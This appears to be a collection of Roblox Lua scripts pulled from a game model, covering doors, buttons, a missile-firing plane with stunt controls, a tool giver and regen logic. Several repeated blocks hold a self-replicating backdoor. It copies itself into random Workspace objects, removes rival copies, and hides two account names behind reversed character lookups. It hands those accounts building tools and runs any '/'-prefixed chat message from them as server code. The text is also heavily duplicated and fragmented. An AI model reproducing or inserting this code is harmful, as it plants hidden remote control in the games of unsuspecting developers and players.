- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() function open()
- if script.Parent.Parent.Active.Value == true then
- for i = 1, script.Parent.Size.x * script.Parent.Parent.Sep.Value do
- script.Parent.CFrame = script.Parent.CFrame * CFrame.new(-1 / script.Parent.Parent.Sep.Value, 0, 0)
- wait(script.Parent.Parent.MiniWait.Value)
- end
- wait(script.Parent.Parent.OpenTime.Value)
- for i = 1, script.Parent.Size.x * script.Parent.Parent.Sep.Value do
- script.Parent.CFrame = script.Parent.CFrame * CFrame.new(1 / script.Parent.Parent.Sep.Value, 0, 0)
- wait(script.Parent.Parent.MiniWait.Value)
- end
- end
- script.Parent.Parent.Active.Value = false
- end
- script.Parent.Parent.Active.Changed:connect(open) end;
- function() function onClicked()
- if script.Parent.Parent.Active.Value == false then
- script.Parent.Parent.Active.Value = true
- end
- end
- script.Parent.ClickDetector.MouseClick:connect(onClicked) end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() function open()
- if script.Parent.Parent.Active.Value == true then
- for i = 1, script.Parent.Size.x * script.Parent.Parent.Sep.Value do
- script.Parent.CFrame = script.Parent.CFrame * CFrame.new(1 / script.Parent.Parent.Sep.Value, 0, 0)
- wait(script.Parent.Parent.MiniWait.Value)
- end
- wait(script.Parent.Parent.OpenTime.Value)
- for i = 1, script.Parent.Size.x * script.Parent.Parent.Sep.Value do
- script.Parent.CFrame = script.Parent.CFrame * CFrame.new(-1 / script.Parent.Parent.Sep.Value, 0, 0)
- wait(script.Parent.Parent.MiniWait.Value)
- end
- end
- script.Parent.Parent.Active.Value = false
- end
- script.Parent.Parent.Active.Changed:connect(open) end;
- function() function onClicked()
- if script.Parent.Parent.Active.Value == false then
- script.Parent.Parent.Active.Value = true
- end
- end
- script.Parent.ClickDetector.MouseClick:connect(onClicked) end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
